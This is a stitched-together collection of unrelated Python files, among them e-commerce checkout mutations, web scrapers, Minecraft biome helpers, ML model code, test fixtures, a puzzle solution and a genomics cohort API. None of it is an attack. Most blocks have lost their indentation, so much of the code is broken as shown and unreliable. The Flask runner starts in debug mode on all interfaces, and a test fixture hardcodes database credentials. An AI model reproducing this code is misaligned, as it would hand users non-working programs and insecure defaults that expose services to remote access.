class CheckoutShippingAddressUpdate(BaseMutation, I18nMixin):
checkout = graphene.Field(Checkout, description='An updated checkout')
class Arguments:
checkout_id = graphene.ID(description='ID of the Checkout.')
shipping_address = AddressInput(
description=(
                'The mailing address to which the checkout will be shipped.'))
class Meta:
description = 'Update shipping address in the existing Checkout.'
@classmethod
def mutate(cls, root, info, checkout_id, shipping_address):
errors = []
checkout = cls.get_node_or_error(
info, checkout_id, errors, 'checkout_id', only_type=Checkout)
if checkout is not None:
shipping_address, errors = cls.validate_address(
shipping_address, errors, instance=checkout.shipping_address)
clean_shipping_method(
checkout, checkout.shipping_method, errors,
info.context.discounts,
get_taxes_for_address(shipping_address))
if errors:
                return CheckoutShippingAddressUpdate(errors=errors)
if shipping_address:
with transaction.atomic():
shipping_address.save()
change_shipping_address_in_cart(checkout, shipping_address)
return CheckoutShippingAddressUpdate(checkout=checkout, errors=errors)
class CheckoutBillingAddressUpdate(CheckoutShippingAddressUpdate):
checkout = graphene.Field(Checkout, description='An updated checkout')
class Arguments:
checkout_id = graphene.ID(description='ID of the Checkout.')
billing_address = AddressInput(
description=(
'The billing address of the checkout.'))
class Meta:
description = 'Update billing address in the existing Checkout.'
@classmethod
def mutate(cls, root, info, checkout_id, billing_address):
errors = []
checkout = cls.get_node_or_error(
info, checkout_id, errors, 'checkout_id', only_type=Checkout)
if billing_address:
billing_address, errors = cls.validate_address(
billing_address, errors, instance=checkout.billing_address)
if errors:
return CheckoutBillingAddressUpdate(errors=errors)
if checkout is not None and billing_address:
with transaction.atomic():
billing_address.save()
change_billing_address_in_cart(checkout, billing_address)
        return CheckoutBillingAddressUpdate(checkout=checkout, errors=errors)
class CheckoutEmailUpdate(BaseMutation):
checkout = graphene.Field(Checkout, description='An updated checkout')
class Arguments:
checkout_id = graphene.ID(description='Checkout ID')
        email = graphene.String(required=True, description='The checkout email address.')
class Meta:
description = 'Updates email address in the existing Checkout object.'
@classmethod
def mutate(cls, root, info, checkout_id, email):
errors = []
checkout = cls.get_node_or_error(
info, checkout_id, errors, 'checkout_id', only_type=Checkout)
if checkout is not None:
checkout.email = email
checkout.save(update_fields=['email'])
return CheckoutEmailUpdate(checkout=checkout, errors=errors)
class CheckoutShippingMethodUpdate(BaseMutation):
checkout = graphene.Field(Checkout, description='An updated checkout')
class Arguments:
checkout_id = graphene.ID(description='Checkout ID')
shipping_method_id = graphene.ID(
required=True, description='Shipping method')
class Meta:
        description = 'Updates the shipping method of the checkout.'
@classmethod
def mutate(cls, root, info, checkout_id, shipping_method_id):
errors = []
checkout = cls.get_node_or_error(
info, checkout_id, errors, 'checkout_id', only_type=Checkout)
shipping_method = cls.get_node_or_error(
info, shipping_method_id, errors, 'shipping_method_id',
only_type=ShippingMethod)
if checkout is not None and shipping_method:
clean_shipping_method(
checkout, shipping_method, errors, info.context.discounts,
info.context.taxes, remove=False)
if errors:
return CheckoutShippingMethodUpdate(errors=errors)
checkout.shipping_method = shipping_method
checkout.save(update_fields=['shipping_method'])
return CheckoutShippingMethodUpdate(checkout=checkout, errors=errors)
class CheckoutComplete(BaseMutation):
order = graphene.Field(Order, description='Placed order')
class Arguments:
checkout_id = graphene.ID(description='Checkout ID')
class Meta:
description = (
'Completes the checkout, creates an order from it and '
'charges the customer\'s funding source.')
@classmethod
def mutate(cls, root, info, checkout_id):
errors = []
checkout = cls.get_node_or_error(
info, checkout_id, errors, 'checkout_id', only_type=Checkout)
if checkout is None:
return CheckoutComplete(errors=errors)
taxes = get_taxes_for_cart(checkout, info.context.taxes)
ready, checkout_error = ready_to_place_order(
checkout, taxes, info.context.discounts)
if not ready:
cls.add_error(field=None, message=checkout_error, errors=errors)
return CheckoutComplete(errors=errors)
try:
order = create_order(
cart=checkout,
tracking_code=analytics.get_client_id(info.context),
discounts=info.context.discounts, taxes=taxes)
except InsufficientStock:
order = None
cls.add_error(
field=None, message='Insufficient product stock.',
errors=errors)
payment = checkout.payments.filter(is_active=True).first()
# FIXME there could be a situation where order was created but payment
# failed. we should cancel/delete the order at this moment I think
# authorize payment
try:
gateway_authorize(payment, payment.token)
except PaymentError as exc:
msg = str(exc)
cls.add_error(field=None, message=msg, errors=errors)
return CheckoutComplete(order=order, errors=errors)
# capture payment
try:
gateway_capture(payment, payment.total)
except PaymentError as exc:
msg = str(exc)
cls.add_error(field=None, message=msg, errors=errors)
# Void payment if the capture failed
gateway_void(payment)
return CheckoutComplete(order=order, errors=errors)
|
from vpngate import VPNGate
from datetime import datetime
# Edit this to use a mirror site instead
vpngate_base_url = "https://www.vpngate.net"
# csv output file
csv_file_path = "output/udp"
sleep_time = 0
vpngate = VPNGate(vpngate_base_url, csv_file_path, sleep_time)
start_time = datetime.now()
print("Script start at: {0}\n".format(start_time))
vpngate.run()
end_time = datetime.now()
print("Script finish at: {0}\n".format(end_time))
running_time = end_time - start_time
print("Running in {0} seconds".format(running_time.total_seconds()))
|
from danniesMovies.wsgi import application
|
from BiomeSettings import biomeSettings
from BiomeMapping import biome_map
# Gets the name of the biome; if the biome is not supported, returns the 'Plains' biome
def get_biome_name(biome):
for key, value in biome_map.items():
if biome in value:
return key
return 'Plains'
# Getters for various biome-specific blocks
def get_wall_block(biome=1):
biomeName = get_biome_name(biome)
return biomeSettings[biomeName]['wall']
def get_floor_block(biome=1):
biomeName = get_biome_name(biome)
return biomeSettings[biomeName]['floor']
def get_fence_block(biome=1):
biomeName = get_biome_name(biome)
return biomeSettings[biomeName]['fence']
def get_road_block(biome=1):
biomeName = get_biome_name(biome)
return biomeSettings[biomeName]['road']
def get_door_block(biome=1):
biomeName = get_biome_name(biome)
return biomeSettings[biomeName]['door']
def get_window_block(biome=1):
biomeName = get_biome_name(biome)
return biomeSettings[biomeName]['window']
def get_beam_block(biome=1):
biomeName = get_biome_name(biome)
return biomeSettings[biomeName]['beam']
def get_hedge_block(biome=1):
biomeName = get_biome_name(biome)
return biomeSettings[biomeName]['hedge']
def get_roof_block(biome=1):
biomeName = get_biome_name(biome)
return biomeSettings[biomeName]['roof']
def get_crop_block(biome=1):
biomeName = get_biome_name(biome)
return biomeSettings[biomeName]['crop']
def get_soil_block(biome=1):
biomeName = get_biome_name(biome)
return biomeSettings[biomeName]['soil']
def get_bridge_block(biome=1):
biomeName = get_biome_name(biome)
return biomeSettings[biomeName]['bridge']
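# Usage sketch (assumes BiomeMapping maps numeric biome ids to the names keyed in
# biomeSettings; the ids below are illustrative only):
#
#     get_wall_block(1)      # wall block for whatever biome id 1 maps to
#     get_wall_block(9999)   # unmapped ids fall back to biomeSettings['Plains']['wall']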
|
from enum import Enum
class HelpMessages(Enum):
ADD = 'Add '
    CONTRIBUTING_FILE = 'a standard Contributing File'
|
# import torch.nn as nn
#
# from ...ops.pointnet2.pointnet2_stack import pointnet2_modules as pointnet2_stack_modules
# from ...utils import common_utils
# from .roi_head_template import RoIHeadTemplate
#
#
# class PVRCNNHead(RoIHeadTemplate):
# def __init__(self, input_channels, model_cfg, num_class=1):
# super().__init__(num_class=num_class, model_cfg=model_cfg)
# self.model_cfg = model_cfg
#
# mlps = self.model_cfg.ROI_GRID_POOL.MLPS
# for k in range(len(mlps)):
# mlps[k] = [input_channels] + mlps[k]
#
# self.roi_grid_pool_layer = pointnet2_stack_modules.StackSAModuleMSG(
# radii=self.model_cfg.ROI_GRID_POOL.POOL_RADIUS,
# nsamples=self.model_cfg.ROI_GRID_POOL.NSAMPLE,
# mlps=mlps,
# use_xyz=True,
# pool_method=self.model_cfg.ROI_GRID_POOL.POOL_METHOD,
# )
#
# GRID_SIZE = self.model_cfg.ROI_GRID_POOL.GRID_SIZE
# c_out = sum([x[-1] for x in mlps])
# pre_channel = GRID_SIZE * GRID_SIZE * GRID_SIZE * c_out
#
# shared_fc_list = []
# for k in range(0, self.model_cfg.SHARED_FC.__len__()):
# shared_fc_list.extend([
# nn.Conv1d(pre_channel, self.model_cfg.SHARED_FC[k], kernel_size=1, bias=False),
# nn.BatchNorm1d(self.model_cfg.SHARED_FC[k]),
# nn.ReLU()
# ])
# pre_channel = self.model_cfg.SHARED_FC[k]
#
# if k != self.model_cfg.SHARED_FC.__len__() - 1 and self.model_cfg.DP_RATIO > 0:
# shared_fc_list.append(nn.Dropout(self.model_cfg.DP_RATIO))
#
# self.shared_fc_layer = nn.Sequential(*shared_fc_list)
#
# self.cls_layers = self.make_fc_layers(
# input_channels=pre_channel, output_channels=self.num_class, fc_list=self.model_cfg.CLS_FC
# )
# self.reg_layers = self.make_fc_layers(
# input_channels=pre_channel,
# output_channels=self.box_coder.code_size * self.num_class,
# fc_list=self.model_cfg.REG_FC
# )
# self.init_weights(weight_init='xavier')
#
# def init_weights(self, weight_init='xavier'):
# if weight_init == 'kaiming':
# init_func = nn.init.kaiming_normal_
# elif weight_init == 'xavier':
# init_func = nn.init.xavier_normal_
# elif weight_init == 'normal':
# init_func = nn.init.normal_
# else:
# raise NotImplementedError
#
# for m in self.modules():
# if isinstance(m, nn.Conv2d) or isinstance(m, nn.Conv1d):
# if weight_init == 'normal':
# init_func(m.weight, mean=0, std=0.001)
# else:
# init_func(m.weight)
# if m.bias is not None:
# nn.init.constant_(m.bias, 0)
# nn.init.normal_(self.reg_layers[-1].weight, mean=0, std=0.001)
#
# def roi_grid_pool(self, batch_dict):
# """
# Args:
# batch_dict:
# batch_size:
# rois: (B, num_rois, 7 + C)
# point_coords: (num_points, 4) [bs_idx, x, y, z]
# point_features: (num_points, C)
# point_cls_scores: (N1 + N2 + N3 + ..., 1)
# point_part_offset: (N1 + N2 + N3 + ..., 3)
# Returns:
#
# """
# batch_size = batch_dict['batch_size']
# rois = batch_dict['rois']
# point_coords = batch_dict['point_coords']
# point_features = batch_dict['point_features']
#
# point_features = point_features * batch_dict['point_cls_scores'].view(-1, 1)
#
# global_roi_grid_points, local_roi_grid_points = self.get_global_grid_points_of_roi(
# rois, grid_size=self.model_cfg.ROI_GRID_POOL.GRID_SIZE
# ) # (BxN, 6x6x6, 3)
# global_roi_grid_points = global_roi_grid_points.view(batch_size, -1, 3) # (B, Nx6x6x6, 3)
#
# xyz = point_coords[:, 1:4]
# xyz_batch_cnt = xyz.new_zeros(batch_size).int()
# batch_idx = point_coords[:, 0]
# for k in range(batch_size):
# xyz_batch_cnt[k] = (batch_idx == k).sum()
#
# new_xyz = global_roi_grid_points.view(-1, 3)
# new_xyz_batch_cnt = xyz.new_zeros(batch_size).int().fill_(global_roi_grid_points.shape[1])
# pooled_points, pooled_features = self.roi_grid_pool_layer(
# xyz=xyz.contiguous(),
# xyz_batch_cnt=xyz_batch_cnt,
# new_xyz=new_xyz,
# new_xyz_batch_cnt=new_xyz_batch_cnt,
# features=point_features.contiguous(),
# ) # (M1 + M2 ..., C)
#
# pooled_features = pooled_features.view(
# -1, self.model_cfg.ROI_GRID_POOL.GRID_SIZE ** 3,
# pooled_features.shape[-1]
# ) # (BxN, 6x6x6, C)
# return pooled_features
#
# def get_global_grid_points_of_roi(self, rois, grid_size):
# rois = rois.view(-1, rois.shape[-1])
# batch_size_rcnn = rois.shape[0]
#
# local_roi_grid_points = self.get_dense_grid_points(rois, batch_size_rcnn, grid_size) # (B, 6x6x6, 3)
# global_roi_grid_points = common_utils.rotate_points_along_z(
# local_roi_grid_points.clone(), rois[:, 6]
# ).squeeze(dim=1)
# global_center = rois[:, 0:3].clone()
# global_roi_grid_points += global_center.unsqueeze(dim=1)
# return global_roi_grid_points, local_roi_grid_points
#
# @staticmethod
# def get_dense_grid_points(rois, batch_size_rcnn, grid_size):
# faked_features = rois.new_ones((grid_size, grid_size, grid_size))
# dense_idx = faked_features.nonzero() # (N, 3) [x_idx, y_idx, z_idx]
# dense_idx = dense_idx.repeat(batch_size_rcnn, 1, 1).float() # (B, 6x6x6, 3)
#
# local_roi_size = rois.view(batch_size_rcnn, -1)[:, 3:6]
# roi_grid_points = (dense_idx + 0.5) / grid_size * local_roi_size.unsqueeze(dim=1) \
# - (local_roi_size.unsqueeze(dim=1) / 2) # (B, 6x6x6, 3)
# return roi_grid_points
#
# def forward(self, batch_dict):
# """
# :param input_data: input dict
# :return:
# """
#
# targets_dict = self.proposal_layer(
# batch_dict, nms_config=self.model_cfg.NMS_CONFIG['TRAIN' if self.training else 'TEST']
# )
# if self.training:
# targets_dict = self.assign_targets(batch_dict)
# batch_dict['rois'] = targets_dict['rois']
# batch_dict['roi_labels'] = targets_dict['roi_labels']
#
# # RoI aware pooling
# pooled_features = self.roi_grid_pool(batch_dict) # (BxN, 6x6x6, C)
#
# grid_size = self.model_cfg.ROI_GRID_POOL.GRID_SIZE
# batch_size_rcnn = pooled_features.shape[0]
# pooled_features = pooled_features.permute(0, 2, 1).\
# contiguous().view(batch_size_rcnn, -1, grid_size, grid_size, grid_size) # (BxN, C, 6, 6, 6)
#
# shared_features = self.shared_fc_layer(pooled_features.view(batch_size_rcnn, -1, 1))
# rcnn_cls = self.cls_layers(shared_features).transpose(1, 2).contiguous().squeeze(dim=1) # (B, 1 or 2)
# rcnn_reg = self.reg_layers(shared_features).transpose(1, 2).contiguous().squeeze(dim=1) # (B, C)
#
# if not self.training:
# batch_cls_preds, batch_box_preds = self.generate_predicted_boxes(
# batch_size=batch_dict['batch_size'], rois=batch_dict['rois'], cls_preds=rcnn_cls, box_preds=rcnn_reg
# )
# batch_dict['batch_cls_preds'] = batch_cls_preds
# batch_dict['batch_box_preds'] = batch_box_preds
# batch_dict['cls_preds_normalized'] = False
# else:
# targets_dict['rcnn_cls'] = rcnn_cls
# targets_dict['rcnn_reg'] = rcnn_reg
#
# self.forward_ret_dict = targets_dict
#
# return batch_dict
|
import requests
from bs4 import BeautifulSoup as soup
import re
import urllib3
import urllib
import time
# url = 'https://film-grab.com/category/1-371/' #4
# url = 'https://film-grab.com/category/2-001/' #1
# url = 'https://film-grab.com/category/2-201/' #1
# url = 'https://film-grab.com/category/1-751/' #1
# url = 'https://film-grab.com/category/2-351/' # 12
#url = 'https://film-grab.com/category/1-661/' #3
#url = 'https://film-grab.com/category/1-781/' #1
url = 'https://film-grab.com/category/1-851/' #12
def source_img(url):
links = []
for x in range(1, 13, 1):
txt = url+'page/'+str(x)+'/'
links.append(txt)
links[0] = url
    # links.append(url) # for single-page processing use this line and comment out the for loop
for l in links:
page = requests.get(l)
html = soup(page.text, 'html.parser')
result = html.find_all(attrs={'class':'popup-image'})
result[0].find_all('img')[0].get('data-large-file')
img_links = []
title = []
for each in result:
img_links.append(each.find_all('img')[0].get('data-large-file'))
title.append(each.find_all('img')[0].get('data-image-title'))
        for img_url in img_links:  # renamed from `url` to avoid shadowing the function parameter
            filename = img_url.split('/')[-1]
            r = requests.get(img_url, allow_redirects=True)
            time.sleep(3)
            open('images/movie_pics/'+filename, 'wb').write(r.content)
source_img(url)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Common fixtures and utils for unittests and functional tests."""
import os
from pymongo import MongoClient
import pytest
import yaml
from orion.algo.base import (BaseAlgorithm, OptimizationAlgorithm)
class DumbAlgo(BaseAlgorithm):
"""Stab class for `BaseAlgorithm`."""
def __init__(self, space, value=5,
scoring=0, judgement=None,
suspend=False, done=False, **nested_algo):
"""Configure returns, allow for variable variables."""
self._times_called_suspend = 0
self._times_called_is_done = 0
self._num = None
self._points = None
self._results = None
self._score_point = None
self._judge_point = None
self._measurements = None
super(DumbAlgo, self).__init__(space, value=value,
scoring=scoring, judgement=judgement,
suspend=suspend,
done=done,
**nested_algo)
def suggest(self, num=1):
"""Suggest based on `value`."""
self._num = num
return [self.value] * num
def observe(self, points, results):
"""Log inputs."""
self._points = points
self._results = results
def score(self, point):
"""Log and return stab."""
self._score_point = point
return self.scoring
def judge(self, point, measurements):
"""Log and return stab."""
self._judge_point = point
self._measurements = measurements
return self.judgement
@property
def should_suspend(self):
"""Cound how many times it has been called and return `suspend`."""
self._times_called_suspend += 1
return self.suspend
@property
def is_done(self):
"""Cound how many times it has been called and return `done`."""
self._times_called_is_done += 1
return self.done
# Hack it into being discoverable
OptimizationAlgorithm.types.append(DumbAlgo)
OptimizationAlgorithm.typenames.append(DumbAlgo.__name__.lower())
@pytest.fixture(scope='session')
def dumbalgo():
"""Return stab algorithm class."""
return DumbAlgo
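# Sketch of how a test might use the fixture (hypothetical test body; `space` stands
# in for whatever space object the real tests construct):
#
#     def test_dumb_suggest(dumbalgo):
#         algo = dumbalgo(space, value=7)
#         assert algo.suggest(2) == [7, 7]          # suggest() returns [value] * num
#         algo.observe([(7,)], [{'objective': 0}])
#         assert algo._points == [(7,)]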
@pytest.fixture()
def exp_config():
"""Load an example database."""
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)),
'experiment.yaml')) as f:
exp_config = list(yaml.safe_load_all(f))
return exp_config
@pytest.fixture(scope='session')
def database():
"""Return Mongo database object to test with example entries."""
client = MongoClient(username='user', password='pass', authSource='orion_test')
database = client.orion_test
yield database
client.close()
@pytest.fixture()
def clean_db(database, exp_config):
"""Clean insert example experiment entries to collections."""
database.experiments.drop()
database.trials.drop()
database.workers.drop()
database.resources.drop()
@pytest.fixture()
def only_experiments_db(database, exp_config):
"""Clean the database and insert only experiments."""
database.experiments.drop()
database.experiments.insert_many(exp_config[0])
database.trials.drop()
database.workers.drop()
database.resources.drop()
|
import time
import os
class Policy:
def __init__(self, n1: int, n2: int, letter: str):
assert(n1 < n2)
self.n1 = n1
self.n2 = n2
self.letter = letter
class Password:
def __init__(self, policy: Policy, password: str):
self.policy = policy
self.password = password
def validate_rule_1(self) -> bool:
# Password should contain the letter at least n1 times and at most n2 times.
count = self.password.count(self.policy.letter)
return (count >= self.policy.n1) and (count <= self.policy.n2)
# Why not do this?:
# return self.password.count(self.policy.letter) in range(self.policy.n1, self.policy.n2 + 1)
# Put simply: it's slower. Which makes sense if you think about possible ways Python could implement the check.
# That said, it's negligible at the size of the real input:
    # It was about 2 seconds slower over 10,000 iterations of the entire input file.
def validate_rule_2(self) -> bool:
# Password should contain the letter in exactly 1 of locations n1 and n2.
# We have to account for these passwords being 1-indexed in the policy.
return (self.password[self.policy.n1 - 1] == self.policy.letter) \
^ (self.password[self.policy.n2 - 1] == self.policy.letter) # ^ (xor) and != will give same result.
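    # Worked example (using the well-known sample line "1-3 a: abcde", i.e.
    # Policy(1, 3, 'a') applied to password 'abcde'):
    #   rule 1: 'abcde'.count('a') == 1 and 1 <= 1 <= 3                  -> valid
    #   rule 2: password[0] == 'a' (True) xor password[2] == 'a' (False) -> valid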
def parse_input(filename: str):
passwords: list[Password] = []
with open(filename, "r") as file:
for line in file:
line = line.strip().split(": ")
policy = line[0].split(" ")
policy_nums = policy[0].split("-")
passwords.append(Password(Policy(int(policy_nums[0]), int(policy_nums[1]), policy[1]), line[1]))
return passwords
def main(input_filename: str):
start_time = time.time()
passwords = parse_input(input_filename)
part1_start = time.time()
passing_policy = 0
for password in passwords:
passing_policy += password.validate_rule_1()
print(f"Part 1: {passing_policy} passwords passed policy 1.")
part2_start = time.time()
passing_policy = 0
for password in passwords:
passing_policy += password.validate_rule_2()
print(f"Part 2: {passing_policy} passwords passed policy 2.")
end_time = time.time()
print("Elapsed Time:")
print(f" Parsing: {(part1_start - start_time) * 1000:.2f} ms")
print(f" Part 1: {(part2_start - part1_start) * 1000:.2f} ms")
print(f" Part 2: {(end_time - part2_start) * 1000:.2f} ms")
print(f" Total: {(end_time - start_time) * 1000:.2f} ms")
return
if __name__ == "__main__":
os.chdir(os.path.split(__file__)[0])
main("../../inputs/2020/day02.txt")
|
from django.apps import AppConfig
class AzdiliConfig(AppConfig):
name = 'azdili'
|
#!flask/bin/python
from app import app
app.run(host="0.0.0.0", port=80, debug=True, threaded=True)
|
import logging
import sys
import time
from vcgencmd import Vcgencmd
if len(sys.argv) == 1:
logging.critical("No screen_id specified")
sys.exit(1)
screen_id = int(sys.argv[1])
def turn_off_screen():
print('turning off screen')
vcgm = Vcgencmd()
output = vcgm.display_power_off(screen_id)
def turn_on_screen():
print('turning on screen')
vcgm = Vcgencmd()
output = vcgm.display_power_on(screen_id)
vcgm = Vcgencmd()
for x in [0,1,2,3,7]:
print('{}: {}'.format(x, vcgm.display_power_state(x)))
turn_off_screen()
time.sleep(5)
turn_on_screen()
time.sleep(5)
turn_off_screen()
time.sleep(5)
turn_on_screen()
|
"""
Copyright 2015, Institute for Systems Biology
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
from datetime import datetime
import endpoints
from protorpc import messages, message_types
from protorpc import remote
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned
from django.contrib.auth.models import User as Django_User
from django.core.signals import request_finished
import django
import MySQLdb
import json
from metadata import MetadataItem, IncomingMetadataItem
from cohorts.models import Cohort as Django_Cohort, Cohort_Perms, Patients, Samples, Filters
from bq_data_access.cohort_bigquery import BigQueryCohortSupport
from api_helpers import *
logger = logging.getLogger(__name__)
INSTALLED_APP_CLIENT_ID = settings.INSTALLED_APP_CLIENT_ID
CONTROLLED_ACL_GOOGLE_GROUP = settings.ACL_GOOGLE_GROUP
DEFAULT_COHORT_NAME = 'Untitled Cohort'
IMPORTANT_FEATURES = [
'tumor_tissue_site',
'gender',
'vital_status',
'country',
'Study',
'age_at_initial_pathologic_diagnosis',
'TP53',
'RB1',
'NF1',
'APC',
'CTNNB1',
'PIK3CA',
'PTEN',
'FBXW7',
'NRAS',
'ARID1A',
'CDKN2A',
'SMAD4',
'BRAF',
'NFE2L2',
'IDH1',
'PIK3R1',
'HRAS',
'EGFR',
'BAP1',
'KRAS',
'DNAseq_data',
'mirnPlatform',
'cnvrPlatform',
'methPlatform',
'gexpPlatform',
'rppaPlatform'
]
BUILTIN_ENDPOINTS_PARAMETERS = [
'alt',
'fields',
'enum',
'enumDescriptions',
'key',
'oauth_token',
'prettyPrint',
'quotaUser',
'userIp'
]
class ReturnJSON(messages.Message):
msg = messages.StringField(1)
class FilterDetails(messages.Message):
name = messages.StringField(1)
value = messages.StringField(2)
class Cohort(messages.Message):
id = messages.StringField(1)
name = messages.StringField(2)
last_date_saved = messages.StringField(3)
perm = messages.StringField(4)
email = messages.StringField(5)
comments = messages.StringField(6)
source_type = messages.StringField(7)
source_notes = messages.StringField(8)
parent_id = messages.IntegerField(9)
filters = messages.MessageField(FilterDetails, 10, repeated=True)
num_patients = messages.StringField(11)
num_samples = messages.StringField(12)
class CohortsList(messages.Message):
items = messages.MessageField(Cohort, 1, repeated=True)
count = messages.IntegerField(2)
class CohortPatientsSamplesList(messages.Message):
patients = messages.StringField(1, repeated=True)
patient_count = messages.IntegerField(2)
samples = messages.StringField(3, repeated=True)
sample_count = messages.IntegerField(4)
cohort_id = messages.IntegerField(5)
class PatientDetails(messages.Message):
clinical_data = messages.MessageField(MetadataItem, 1)
samples = messages.StringField(2, repeated=True)
aliquots = messages.StringField(3, repeated=True)
class DataDetails(messages.Message):
SampleBarcode = messages.StringField(1)
DataCenterName = messages.StringField(2)
DataCenterType = messages.StringField(3)
DataFileName = messages.StringField(4)
DataFileNameKey = messages.StringField(5)
DatafileUploaded = messages.StringField(6)
DataLevel = messages.StringField(7)
Datatype = messages.StringField(8)
GenomeReference = messages.StringField(9)
GG_dataset_id = messages.StringField(10)
GG_readgroupset_id = messages.StringField(11)
Pipeline = messages.StringField(12)
Platform = messages.StringField(13)
platform_full_name = messages.StringField(14)
Project = messages.StringField(15)
Repository = messages.StringField(16)
SDRFFileName = messages.StringField(17)
SecurityProtocol = messages.StringField(18)
CloudStoragePath = messages.StringField(19)
class SampleDetails(messages.Message):
biospecimen_data = messages.MessageField(MetadataItem, 1)
aliquots = messages.StringField(2, repeated=True)
patient = messages.StringField(3)
data_details = messages.MessageField(DataDetails, 4, repeated=True)
data_details_count = messages.IntegerField(5)
error = messages.StringField(6)
class DataFileNameKeyList(messages.Message):
datafilenamekeys = messages.StringField(1, repeated=True)
count = messages.IntegerField(2)
class GoogleGenomicsItem(messages.Message):
SampleBarcode = messages.StringField(1)
GG_dataset_id = messages.StringField(2)
GG_readgroupset_id = messages.StringField(3)
class GoogleGenomicsList(messages.Message):
items = messages.MessageField(GoogleGenomicsItem, 1, repeated=True)
count = messages.IntegerField(2)
def are_there_bad_keys(request):
'''
Checks for unrecognized fields in an endpoint request
:param request: the request object from the endpoint
:return: boolean indicating True if bad (unrecognized) fields are present in the request
'''
unrecognized_param_dict = {
k: request.get_unrecognized_field_info(k)[0]
for k in request.all_unrecognized_fields()
if k not in BUILTIN_ENDPOINTS_PARAMETERS
}
return unrecognized_param_dict != {}
def are_there_no_acceptable_keys(request):
'''
Checks for a lack of recognized fields in an endpoints request. Used in save_cohort and preview_cohort endpoints.
:param request: the request object from the endpoint
:return: boolean indicating True if there are no recognized fields in the request.
'''
param_dict = {
k.name: request.get_assigned_value(k.name)
for k in request.all_fields()
if request.get_assigned_value(k.name)
}
return param_dict == {}
def construct_parameter_error_message(request, filter_required):
err_msg = ''
sorted_acceptable_keys = sorted([k.name for k in request.all_fields()], key=lambda s: s.lower())
unrecognized_param_dict = {
k: request.get_unrecognized_field_info(k)[0]
for k in request.all_unrecognized_fields()
if k not in BUILTIN_ENDPOINTS_PARAMETERS
}
if unrecognized_param_dict:
bad_key_str = "'" + "', '".join(unrecognized_param_dict.keys()) + "'"
err_msg += "The following filters were not recognized: {}. ".format(bad_key_str)
if filter_required:
err_msg += "You must specify at least one of the following " \
"case-sensitive filters: {}".format(sorted_acceptable_keys)
else:
err_msg += "Acceptable filters are: {}".format(sorted_acceptable_keys)
return err_msg
Cohort_Endpoints = endpoints.api(name='cohort_api', version='v1', description="Get information about "
"cohorts, patients, and samples. Create and delete cohorts.",
allowed_client_ids=[INSTALLED_APP_CLIENT_ID, endpoints.API_EXPLORER_CLIENT_ID])
@Cohort_Endpoints.api_class(resource_name='cohort_endpoints')
class Cohort_Endpoints_API(remote.Service):
GET_RESOURCE = endpoints.ResourceContainer(token=messages.StringField(1), cohort_id=messages.IntegerField(2))
@endpoints.method(GET_RESOURCE, CohortsList,
path='cohorts_list', http_method='GET', name='cohorts.list')
def cohorts_list(self, request):
'''
Returns information about cohorts a user has either READER or OWNER permission on.
Authentication is required. Optionally takes a cohort id as a parameter to
only list information about one cohort.
'''
user_email = None
cursor = None
filter_cursor = None
db = None
if endpoints.get_current_user() is not None:
user_email = endpoints.get_current_user().email()
# users have the option of pasting the access token in the query string
# or in the 'token' field in the api explorer
# but this is not required
access_token = request.get_assigned_value('token')
if access_token:
user_email = get_user_email_from_token(access_token)
cohort_id = request.get_assigned_value('cohort_id')
if user_email:
django.setup()
try:
user_id = Django_User.objects.get(email=user_email).id
            except (ObjectDoesNotExist, MultipleObjectsReturned) as e:
logger.warn(e)
raise endpoints.NotFoundException("%s does not have an entry in the user database." % user_email)
query_dict = {'cohorts_cohort_perms.user_id': user_id, 'cohorts_cohort.active': unicode('1')}
if cohort_id:
query_dict['cohorts_cohort.id'] = cohort_id
query_str = 'select cohorts_cohort.id, ' \
'cohorts_cohort.name, ' \
'cohorts_cohort.last_date_saved, ' \
'cohorts_cohort_perms.perm, ' \
'auth_user.email, ' \
'cohorts_cohort_comments.content as comments, ' \
'cohorts_source.type as source_type, ' \
'cohorts_source.notes as source_notes, ' \
'cohorts_source.parent_id ' \
'from cohorts_cohort_perms ' \
'join cohorts_cohort ' \
'on cohorts_cohort.id=cohorts_cohort_perms.cohort_id ' \
'join auth_user ' \
'on auth_user.id=cohorts_cohort_perms.user_id ' \
'left join cohorts_cohort_comments ' \
'on cohorts_cohort_comments.user_id=cohorts_cohort_perms.user_id ' \
'left join cohorts_source ' \
'on cohorts_source.cohort_id=cohorts_cohort_perms.cohort_id '
query_tuple = ()
if query_dict:
query_str += ' where ' + '=%s and '.join(key for key in query_dict.keys()) + '=%s'
query_tuple = tuple(value for value in query_dict.values())
filter_query_str = ''
row = None
try:
db = sql_connection()
cursor = db.cursor(MySQLdb.cursors.DictCursor)
cursor.execute(query_str, query_tuple)
data = []
for row in cursor.fetchall():
filter_query_str = 'SELECT name, value ' \
'FROM cohorts_filters ' \
'WHERE cohorts_filters.resulting_cohort_id=%s'
filter_cursor = db.cursor(MySQLdb.cursors.DictCursor)
filter_cursor.execute(filter_query_str, (str(row['id']),))
filter_data = []
for filter_row in filter_cursor.fetchall():
filter_data.append(FilterDetails(
name=str(filter_row['name']),
value=str(filter_row['value'])
))
data.append(Cohort(
id=str(row['id']),
name=str(row['name']),
last_date_saved=str(row['last_date_saved']),
perm=str(row['perm']),
email=str(row['email']),
comments=str(row['comments']),
source_type=None if row['source_type'] is None else str(row['source_type']),
source_notes=None if row['source_notes'] is None else str(row['source_notes']),
parent_id=None if row['parent_id'] is None else int(row['parent_id']),
filters=filter_data
))
return CohortsList(items=data, count=len(data))
except (IndexError, TypeError) as e:
raise endpoints.NotFoundException(
"User {}'s cohorts not found. {}: {}".format(user_email, type(e), e))
except MySQLdb.ProgrammingError as e:
msg = '{}:\n\tcohort query: {} {}\n\tfilter query: {} {}'\
.format(e, query_str, query_tuple, filter_query_str, str(row))
logger.warn(msg)
raise endpoints.BadRequestException("Error retrieving cohorts or filters. {}".format(msg))
finally:
if cursor: cursor.close()
if filter_cursor: filter_cursor.close()
if db and db.open: db.close()
request_finished.send(self)
else:
raise endpoints.UnauthorizedException("Authentication failed.")
GET_RESOURCE = endpoints.ResourceContainer(cohort_id=messages.IntegerField(1, required=True),
token=messages.StringField(2))
